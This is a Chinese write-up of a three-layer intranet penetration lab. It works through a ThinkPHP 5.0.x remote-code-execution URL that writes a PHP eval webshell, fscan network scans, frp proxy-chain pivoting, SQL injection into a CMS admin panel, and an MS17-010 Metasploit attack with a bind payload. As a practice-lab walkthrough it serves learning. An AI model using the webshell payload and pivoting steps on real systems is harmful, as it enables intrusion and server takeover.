三层内网渗透笔记-靶场(teamssix.com)
环境搭建
参考:https://blog.csdn.net/qq_63844103/article/details/126195711
宝塔映射 端口 target 1和target2
开始:
target1
外网打点
tp5在 5.0-5.0.24 和 5.1.0-5.1.30都是存在RCE(Remote code Execution)的,这里运气很好,直接使用5.0.x路由默认兼容模式进行RCE,使用以下payload 执行 id命令:
写shell
http://192.168.1.128/index.php/index.php/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=qaxnb.php&vars[1][1]=%3C?PHP%20@eval($_POST[%27QAXNB666%27]);?%3E
省略验证步骤,直接使用蚁剑进行连接。
找到第一层flag
target2
接上文,已经拿下第一台服务器,尝试对这台服务器进行信息收集:
双网卡,证明这台服务器处于企业架构的DMZ(非军事区)区域,且是两个网段的边界节点,那么我们只要借助这台服务器作为跳板即可进入这家企业的内网,至少进入了 192.168.22.x/24网段的内网。
22 网段信息收集
使用fscan (https://github.com/shadow1ng/fscan)工具
对 192.168.22.x/24 网段进行扫描:
./fscan_amd64 -h 192.168.22.1/24 -o fscan.log
查看扫描结果:
发现网段内还存在 192.168.22.128 和 192.168.22.129 , 且 192.168.22.129:80 存在 cms服务。
搭建跳板
启用frp 服务端
下载frps到自己的vps上,frps.ini 配置如下 :
其中 token 表示客户端进行连接的验证参数, 监听端口为17001, dashboard 为frps自带的仪表盘,方便对frps运行情况进行查看,
使用命令 frps-c frps.ini 启动即可,如果想要后台运行,可以加入service或者使用nohup启动。
netstat 查看对应端口在监听则证明启动成功。使用配置的dashboard端口也能成功进入。
Target1 客户端配置
将frpc 传入target1 /tmp/frp目录:
其中common内容与frps.ini保持一致即可, target1客户端分别配置了socks5与http的代理方式,使用 frpc-c frpc.ini 进行启动:
这样就相当于打通了外部与该企业的内网,在互联网挂着vps 16004/16005的代理就能访问 Target2 所在的网段:
进入第二层内网
通过浏览器插件配置代理,因为浏览器不支持socks5 代理的加密认证,所以这里配置http方式
再次访问 192.168.22.128,成功访问,到此我们就已经访问了企业第二层内网:
proxifer
Bage cms 渗透
注释处存在提示
sql注入拿到 得到(admin/123qwe):
进入后台,拿到第二个flag
模板写shell
拿到target2
用蚁剑进行连接,
进入第三层内网
同样的步骤,先对刚拿下的Taget2 进行信息收集:
发现和 Target1 类似,同样是双网卡,且能访问192.168.33.128 网段,和 Target1 不同的是不能出网,如果类比企业的话,33可能就是企业的核心生产网。
再次上传fscan,对33网段进行内网大保健:
fscan 对 33网段信息收集,
./fscan_amd64 -h 192.168.33.1/24 -o fscan.log
搭建双层代理
往内网越深,需要搭建的代理就越多,内网的机器往往都是不出网的,所以需要依赖DMZ的机器作为总的出入口搭建代理链。代理链搭建其实很简单,就是在Target1 上启动服务端,Target2 通过客户端连接服务端, 然后在使用代理时先让代理走target1 然后再走target2,即:
Hacker<->VPS<->Taget1<->Taget2<->Taget3
给Target1 运行frps 服务端,配置使用和vps相同的参数:
自己的复现:
Target1 上开始监听Target2 客户端配置的代理ip时,说明配置成功。
永恒之蓝(MS17-010)
永恒之蓝这个漏洞很老了,算是复古一波,利用方式在msf里面就有,所以可以在vps上下载msf,给vps挂上代理链即可使用msf发起对Target3 的攻击。在linux上对应用进行强制代理的工具可以使用 proxychains-ng
因为 前面frp 有设置socke5 的账号和密码,不输入会无法连接,卡在这里了,后来对比参考文章才想到。
刚刚fscan扫描结果可知192.168.33.33 开启了 139和445 端口,使用proxtchain测试下,使用也非常简单,在需要代理的命令前面加上 proxychain即可:
proxychains telnet 192.168.33.33 139
从上图可以看到端口已经通了,这时候就可以打开msf一把梭了。
msf
使用proxychains 启动msfconsole
proxychains msfconsole
搜索ms17-010,直接使用第一个就好:
因为Target3 是不能出网的 ,所以不能使用默认的反向payload,需要指定正向payload:
set payload windows/x64/meterpreter/bind_tcp_uuid
- 设置目标参数信息
5. exploit !!!
拿到Taget3 最高权限!尝试去读取flag
截取图片,下载
到这里已经拿到了第三层的内网主机最高权限,fscan扫描也没有其他主机信息,可以确认这次就基本打穿了。
渗透流程参考:https://mp.weixin.qq.com/s/oa_7YBrvtCRIYlBbwcqoVQ,部分截图引用该公众号
三层内网渗透笔记-靶场(teamssix.com)相关推荐
- vulnstack内网渗透环境靶场-1 大全
一.搭建vulnstack靶场环境 主要以真实企业环境为实例搭建一系列靶场,通过练习另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环,下载地址: http://vulnstack ...
- 内网渗透初探(靶场环境搭建+web层面实验+内网基本操作)
靶场环境搭建 在此我使用的是红日安全的环境 下载地址(红日安全) 图片取自互联网,ip地址以实际地址为准 操作系统 IP地址 攻击者 kali IP地址:192.168.3.10 攻击者 Window ...
- 内网渗透—红日靶场三
文章目录 0x01.环境配置 0x02.Centos getshell 0x03.Centos提权 0x04.内网穿透-设置路由 0x05.内网穿透-设置代理 0x06.获取内网目标shell 通过s ...
- 内网渗透笔记——三层发现and四层发现
三层发现(网络层) 最常用ping命令,但是如果防火墙一开,就无法ping到对方.三层发现的优点在于,arping只能发现同一个网段的用户,而三层发现可以发现不同网段但是互联的用户 fping -a ...
- 内网渗透笔记——二层发现
一.OSI七层模型 物理层 数据链路层 网络层 传输层 会话层 表示层 应用层 那所谓二层发现(交换机,mac地址,arp),就是利用数据链路层进行主机的发现 三层--利用ping命令 arping命 ...
- 红日安全内网渗透笔记
靶场下载地址:漏洞详情 环境配置参考:[红日安全-VulnStack]ATT&CK实战系列--红队实战(二) - yokan - 博客园 此实战仅有3台机器 DMZ区的WEB机 .核心区的AD ...
- 内网渗透DC-1靶场通关(CTF)
最新博客见我的个人博客地址 DC系列共9个靶场,本次来试玩一下DC-1,共有5个flag,下载地址. 下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题. ...
- 内网渗透笔记——msf
Masscan 号称五分钟扫遍互联网 性能优越,极限速度 1000w/s,参数 跟 nmap 差不多 -p 80,8000-8100 10.0.0.0/24 --max-rate=100000 ...
- 内网渗透笔记——:)一个笑脸
打靶机 靶机准备与安装---vulnhub-Metasploitable2-Linux Vulnerable By Design ~ VulnHubVulnHub provides materials ...
最新文章
- 让VMware由bios启动方式,转而支持EFI启动方式
- 漂亮!商汤EDVR算法获NTIRE 2019 视频恢复比赛全部四项冠军,代码将开源!
- Java 7 对ArrayList和HashMap的性能的提升
- Nebula Challenge 04
- 驾乘华为云 成就 AI 开发者的不凡
- linux--rbtree 解惑 insert
- oracle asm和文件系统,Oracle技术之ASM迁移至文件系统
- sparksql对hive操作
- 用java有理数类包含加减乘除_用java具体代码实现分数(即有理数)四则运算
- jquery中的attr函数attr(name)、attr(key,value)、attr(properties)、attr(key,fn)、removeAttr
- 首届全国大学生工程训练综合能力竞赛圆满落幕
- java webservice调用sap_java调用sap webservice
- 内存卡卡速测试软件,手机绝配 这款128G存储卡实测速度惊人
- 许愿墙 php源码,许愿网许愿墙 v1 共享版
- AI+科学计算-昇思MindSpore都给我们带来哪些惊喜?
- 雨量传感器开发:MLX75310光照检测与雨滴感应RLS
- OMF(Oracle Managed Files,Oracle管理的文件)介绍
- 牛客--2019网易--扭蛋机
- Unity3D 射击游戏练习实例
- context.getContentResolver().query()详细用法详解
热门文章
- ERP系统是一种服务器吗,erp系统可以用云服务器吗
- 关于UI测试的相关及技巧
- 如何安装和设置WordPress多站点网络
- python代码一行过长怎么办_Python – 我写代码时如果有一行过长该怎么处理?
- Pytorch计算神经网络的参数量和浮点操作数
- 商品与产品的哲学区别与不可知论的“知识”统一能力
- 6.机器学习sklearn------上证指数涨跌预测
- ios 实现价钱打折效果 数字上划横线
- linux平台Android studio安装步骤
- 探花交友_第12章_实现推荐系统(新版)